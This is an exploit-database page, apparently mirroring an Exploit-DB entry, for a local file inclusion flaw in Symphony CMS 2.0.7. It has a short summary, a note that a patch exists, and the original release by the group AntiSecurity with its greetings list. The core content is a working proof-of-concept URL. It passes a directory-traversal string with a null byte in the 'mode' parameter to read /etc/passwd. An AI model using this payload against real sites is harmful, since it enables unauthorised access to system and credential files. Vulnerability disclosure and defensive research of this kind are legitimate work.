header-logo
Suggest Exploit
vendor:
Symphony CMS
by:
AntiSecurity [ NoGe Vrs-hCk OoN_BoY Paman zxvf s4va ]
7,5
CVSS
HIGH
Local File Inclusion
22
CWE
Product Name: Symphony CMS
Affected Version From: 2.0.7
Affected Version To: 2.0.7
Patch Exists: YES
Related CWE: N/A
CPE: a:symphonycms:symphony_cms:2.0.7
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2010

Symphony CMS Local File Inclusion Vulnerability

A Local File Inclusion (LFI) vulnerability exists in Symphony CMS version 2.0.7. An attacker can exploit this vulnerability to include arbitrary files from the local system, which may lead to the disclosure of sensitive information. The vulnerability is due to insufficient sanitization of user-supplied input to the 'mode' parameter in the 'index.php' script. An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable script. The PoC provided sends a request to the vulnerable script to include the '/etc/passwd' file.

Mitigation:

The vendor has released a patch to address this vulnerability. Users are advised to upgrade to the latest version of Symphony CMS.
Source

Exploit-DB raw data:

=============================================================================================================


  [o] Symphony CMS Local File Inclusion Vulnerability

       Software : Symphony CMS version 2.0.7
       Download : http://symphony-cms.com/download/releases/current/
       Author   : AntiSecurity [ NoGe Vrs-hCk OoN_BoY Paman zxvf s4va ]
       Contact  : public[at]antisecurity[dot]org
       Home     : http://antisecurity.org/


=============================================================================================================


  [o] Exploit

       http://localhost/[path]/index.php?mode=[LFI]


  [o] PoC

       http://localhost/index.php?mode=../../../../../../../../../../../../../../../etc/passwd%00


=============================================================================================================


  [o] Greetz

       Angela Zhang stardustmemory aJe martfella Genex
       H312Y }^-^{ matthews wishnusakti xrootboy
       k1tk4t str0ke kaka11 inc0mp13te pizzyroot
       ArRay bjork xmazinha veter f1
       all people in #evilc0de [at] irc.byroe.net


=============================================================================================================


  [o] May 30 2010 - GMT +07:00 Jakarta, Indonesia

Navigation

Suggest Exploit

Services By CQR